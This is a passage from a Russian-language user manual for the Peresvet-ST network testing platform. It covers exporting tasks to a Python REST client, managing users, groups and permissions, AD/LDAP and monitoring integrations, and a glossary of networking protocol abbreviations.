Для повторяемых испытаний и переноса сценариев между стендами задачу можно экспортировать в Python-архив. Такой архив содержит конфигурацию выбранной задачи и готовый клиент для REST API, поэтому пользователь может создать копию задачи, запустить её, остановить или дождаться завершения без ручной настройки в веб-интерфейсе.

Экспорт доступен на странице задачи: откройте Задачи, перейдите в нужную задачу, нажмите Параметры и выберите Экспортировать задачу в Python. Контроллер скачает архив вида peresvet-st-task-<ID>-python.zip.

В архив входят:

ФайлНазначение
task_config.jsonКонфигурация задачи, подготовленная для создания новой задачи через API
client.pyНебольшой Python-клиент для авторизации и работы с задачами
run.pyКомандная оболочка для типовых действий: создать, обновить, запустить, остановить, дождаться завершения и получить состояние задачи
requirements.txtЗависимости Python-клиента
metadata.jsonСведения об исходной задаче и времени экспорта

Минимальная подготовка рабочего каталога:

mkdir peresvet-st-task-6168-python
unzip peresvet-st-task-6168-python.zip -d peresvet-st-task-6168-python
cd peresvet-st-task-6168-python

python3 -m venv .venv
source .venv/bin/activate
pip install -r requirements.txt

Перед запуском укажите адрес контроллера и учетные данные пользователя, который имеет право создавать и запускать задачи:

export SYSTEM_TRACE_URL="http://controller.example:8080"
export SYSTEM_TRACE_EMAIL="user@example.com"
export SYSTEM_TRACE_PASSWORD="password"

Пример полного сценария: создать новую задачу из экспортированной конфигурации, сразу запустить её и дождаться финального статуса:

python run.py create --start --wait

Отдельные команды можно использовать в пайплайнах или внешних скриптах:

python run.py create
python run.py start 123 --wait
python run.py stop 123
python run.py finish 123
python run.py get 123

Если учетные данные нельзя хранить в переменных окружения, их можно передать параметрами команды:

python run.py --base-url "http://controller.example:8080" \
--email "user@example.com" \
--password "password" \
create --start --wait

Python-экспорт использует тот же публичный REST API, что и веб-интерфейс. В архив не записываются пароли или токены доступа; авторизация выполняется при запуске скрипта. Если нужна интеграция без веб-интерфейса, архив также можно получить напрямую через API: GET /v1/tasks/{id}/export/python. Ответом будет ZIP-файл с тем же набором скриптов и конфигурацией задачи.

Пользователи и группы

Вкладка "Пользователи и группы" в веб-интерфейсе позволяет удобно управлять учетными записями: создавать, редактировать и удалять пользователей и группы, обеспечивая эффективное администрирование доступа и ролей в системе.

Пользователи и группы Пересвет-СТ 2.1

Рис. 11.1 – Раздел «Пользователи»

Настройка групп

Создание группы

Для того, чтобы создать группу для пользователей необходимо:

  1. Перейти в раздел Пользователи → Группы;

  2. Далее нажать на кнопку «Создать Группу» (рис. Рис. 10)

Рис. 10

Рис. 10 – Кнопка «Создать группу»

  1. В окне «Новый пользователь» заполнить поле «Название группы»

  2. Выбрать права пользователей группы из следующего списка:

    • Доступ к дашбордам
    • Создание групп
    • Удаление групп
    • Чтение групп
    • Редактирование групп
    • Чтение логов
    • Чтение настроек
    • Редактирование настроек
    • Чтение задач
    • Редактирование задач
    • Блокировка пользователей
    • Создание пользователей
    • Удаление пользователей
    • Чтение пользователей
    • Редактирование пользователей
  3. Далее, для создания группы необходимо нажать на кнопку «Применить».

Редактирование группы

Для того, чтобы редактировать группу для пользователей необходимо:

  1. Перейти в раздел Пользователи → Группы;

  2. Выбрать нужную группу и напротив нее нажать на кнопку

  3. Выполнить необходимое изменение в параметрах «Название группы» «Права пользователей в группе»

  4. Далее, для сохранения настроек групы необходимо нажать на кнопку «Применить».

Удаление группы

Для того, чтобы удалить группу для пользоветелей необходимо:

  1. Перейти в раздел Пользователи → Группы;

  2. Выбрать нужную группу и напротив нее нажать на кнопку

  3. Далее, в появившемся окне «Удаление группы» для выбранной группы подтвердите удаление, нажатием кнопки «Подтвердить».

Настройка пользователей

Создание пользователя

Для того, чтобы создать группу для пользоветелй необходимо:

  1. Перейти в раздел Пользователи → Пользователи;

  2. Далее нажать на кнопку «Создать Пользователя» (рис. Рис. 11);

Рис. 2

Рис. 11 – Кнопка «Создать Пользователя»

  1. В окне «Новый пользователь» заполнить поле «Адрес эл. почты»;

  2. Заполнить поле «Имя пользователя»;

  3. Выбрать соответстсвующую группу из списка групп;

  4. Далее, для создания пользователя необходимо нажать на кнопку «Применить»;

  5. После это в окне «Данные для входа» появятся пара логина и пароля для прохождения аутентификации в веб-интерфейсе;

  6. При первой аутентификации пользователю будет предложено сменить пароль (см. раздел Смена пароля).

Редактирование пользователя

Для того, чтобы редактировать данные пользователя необходимо:

  1. Перейти в раздел Пользователи → Пользователи;

  2. Выбрать нужного пользователя и напротив нее нажать на кнопку и в появившемся окне нажать кнопку «Редактировать».

  3. Выполнить необходимое изменение в параметрах пользователя

  4. Далее, для сохранения настроек пользователя необходимо нажать на кнопку «Применить».

Блокировка пользователя

Для того, чтобы редактировать данные пользователя необходимо:

  1. Перейти в раздел Пользователи → Пользователи;

  2. Выбрать нужного пользователя и напротив нее нажать на кнопку и в появившемся окне нажать кнопку «Заблокировать».

  3. Далее, для применения блокировки к пользователю необходимо нажать на кнопку «Применить».

  4. Далее напротив заблокированного пользователя в столбце «Статус» у него изменится состояние с «Активный» на «Заблокированный»

Удаление пользователя

Для того, чтобы удалить пользователя необходимо:

  1. Перейти в раздел Пользователи → Пользователи;

  2. Выбрать нужного пользователя и напротив нее нажать на кнопку

  3. Далее, в появившемся окне «Удаление пользователя» для выбранного пользователя подтвердите удаление, нажатием кнопки «Подтвердить».

Интеграция с AD/LDAP

Пересвет-СТ поддерживает интеграцию с Active Directory и LDAP-каталогами для централизованного управления учётными записями. Это позволяет использовать существующую корпоративную директорию вместо ручного создания пользователей и групп в веб-интерфейсе.

Подключение к AD/LDAP

Настройка подключения к серверу каталогов выполняется в разделе «Пользователи и группы» веб-интерфейса контроллера. Администратор указывает адрес сервера, Base DN, учётные данные сервисной записи и параметры TLS-соединения.

Импорт групп из AD/LDAP

После подключения к каталогу доступен импорт групп — администратор выбирает нужные группы из каталога, и они автоматически создаются в Пересвет-СТ с возможностью назначения прав доступа. Синхронизация состава групп выполняется при каждом входе пользователя.

Импорт пользователей из AD/LDAP

Пользователи, входящие в импортированные группы, автоматически получают доступ к веб-интерфейсу при аутентификации через свои доменные учётные данные. Ручное создание учётных записей для таких пользователей не требуется — при первом входе профиль создаётся автоматически на основе атрибутов из каталога.

Интеграция с внешними системами мониторинга

Пересвет-СТ поддерживает интеграцию с распространёнными системами мониторинга, что позволяет встроить платформу в существующую инфраструктуру наблюдения и оперативно отслеживать ход тестирования.

SNMP

SNMP-агент устанавливается на машину с агентом Пересвет-СТ в соответствии с официальной инструкцией по установке Net-SNMP. После установки внешние системы управления сетью (NMS) смогут опрашивать состояние агента, получая информацию о текущей нагрузке, статусе задач и доступности компонентов.

Syslog

Syslog настраивается на ОС агента Пересвет-СТ средствами системного логирования (rsyslog, syslog-ng) в соответствии с документацией используемого дистрибутива. После настройки пересылки на внешний syslog-сервер все события и диагностические сообщения агента будут централизованно собираться в единое хранилище для анализа и аудита.

Prometheus

Prometheus может быть установлен на любую ОС, на которой работает агент Пересвет-СТ, в соответствии с официальной инструкцией по установке. После установки Prometheus будет собирать метрики работы агента и ядра генерации трафика, которые можно использовать для построения алертов и дашбордов.

Grafana

Пересвет-СТ поставляется с набором готовых дашбордов Grafana, интегрированных в веб-интерфейс контроллера в разделе «Метрики». Эти дашборды можно изменять под свои нужды, а также создавать новые — используя SQL-запросы к ClickHouse на основе уже существующих запросов из наших дашбордов как примера.

Zabbix

Zabbix-агент устанавливается на машину с агентом Пересвет-СТ в соответствии с официальной инструкцией по установке. После установки агент Zabbix начинает работать и передавать данные о состоянии системы на сервер Zabbix, обеспечивая мониторинг в рамках корпоративной инфраструктуры.

Перечень принятых сокращений

HTTP/HTTPSПротокол прикладного уровня передачи данных
IP-адресУникальный адрес, идентифицирующий устройство в интернете или локальной сети
SSLКриптографический протокол
ВМВиртуальная машина
TCPПротоколом транспортного уровня
СУБДСистема управления базой данных
ПОПрограммное обеспечение
BGPBorder Gateway Protocol — протокол граничного шлюза
IS-ISIntermediate System to Intermediate System — протокол маршрутизации
OSPFOpen Shortest Path First — протокол динамической маршрутизации
LDPLabel Distribution Protocol — протокол распределения меток
LLDPLink Layer Discovery Protocol — протокол обнаружения канального уровня
LLDPDULLDP Data Unit — блок данных протокола LLDP
TLVType-Length-Value — формат кодирования данных (тип-длина-значение)
MPLSMultiprotocol Label Switching — многопротокольная коммутация по меткам
LSPLabel Switched Path — путь с коммутацией по меткам
LSRLabel Switching Router — маршрутизатор с коммутацией по меткам
SRSegment Routing — сегментная маршрутизация
SRGBSegment Routing Global Block — глобальный блок меток SR
SIDSegment Identifier — идентификатор сегмента
DRDesignated Router — выделенный маршрутизатор (OSPF)
BDRBackup Designated Router — резервный выделенный маршрутизатор (OSPF)
LSALink State Advertisement — объявление о состоянии канала (OSPF)
LSPLink State PDU — протокольный блок данных о состоянии канала (IS-IS)
CSNPComplete Sequence Number PDU — полный PDU с порядковыми номерами (IS-IS)
PSNPPartial Sequence Number PDU — частичный PDU с порядковыми номерами (IS-IS)
ASAutonomous System — автономная система
EVPNEthernet Virtual Private Network — виртуальная частная сеть Ethernet
PBB-EVPNProvider Backbone Bridging EVPN — EVPN-сервис с backbone MAC и I-SID
RIPRouting Information Protocol — протокол обмена маршрутами
IGMPInternet Group Management Protocol — протокол управления IPv4 multicast-группами
MLDMulticast Listener Discovery — протокол управления IPv6 multicast-группами
PIMProtocol Independent Multicast — протокол multicast-маршрутизации
SSMSource-Specific Multicast — multicast с указанием источника
RPRendezvous Point — точка встречи для multicast-групп
OAMOperations, Administration and Maintenance — эксплуатационный контроль и диагностика сети
mLDPMultipoint LDP — расширение LDP для multicast LSP
MPLS-TPMPLS Transport Profile — транспортный профиль MPLS
PWPseudowire — эмуляция L2-сервиса поверх пакетной сети
VPLSVirtual Private LAN Service — multipoint L2VPN-сервис
VPWSVirtual Private Wire Service — point-to-point L2VPN-сервис
FEC129Forwarding Equivalence Class 129 — тип FEC для L2VPN pseudowire
AIIAttachment Individual Identifier — идентификатор точки подключения L2VPN
RDRoute Distinguisher — различитель маршрута VPN/EVPN
RTRoute Target — атрибут импорта/экспорта VPN/EVPN-маршрутов
EVIEVPN Instance — идентификатор EVPN-инстанса
BGP-LSBGP Link-State — передача link-state топологии через BGP
FlowSpecBGP Flow Specification — правила фильтрации трафика, распространяемые через BGP
MEPMaintenance End Point — конечная точка OAM-контроля
CC/CVContinuity Check / Connectivity Verification — проверка непрерывности и связности
AISAlarm Indication Signal — сигнализация аварии в OAM
LCKLock Instruct — сообщение о блокировке в OAM
DMDelay Measurement — измерение задержки
LMLoss Measurement — измерение потерь
P2MPPoint-to-Multipoint — соединение от одной точки к нескольким
MP2MPMultipoint-to-Multipoint — соединение между несколькими точками
VxLANVirtual Extensible LAN — виртуальная расширяемая локальная сеть
VTEPVxLAN Tunnel Endpoint — конечная точка VxLAN-туннеля
VNIVxLAN Network Identifier — идентификатор виртуальной сети VxLAN
ECMPEqual-Cost Multi-Path — маршрутизация по нескольким равноценным путям
MRTMulti-threaded Routing Toolkit — формат файлов для хранения топологии маршрутизации

Схема использования Пересвет-СТ

В данном разделе представлена схема использования Пересвет-СТ (см. Рис. 12). Данный пример показывает возможность тестирования любых сетевых устройств, как и приложений, стоящими между агентами Пересвет-СТ, а также использование одного контроллера Пересвет-СТ для управления внешними и внутренними агентами Пересвет-СТ. Агенты могут выступать как в роли генератора трафика, так и в роли сервера, принимающего трафик.

Рис. 12

Рис. 12 – Схема использования Пересвет-СТ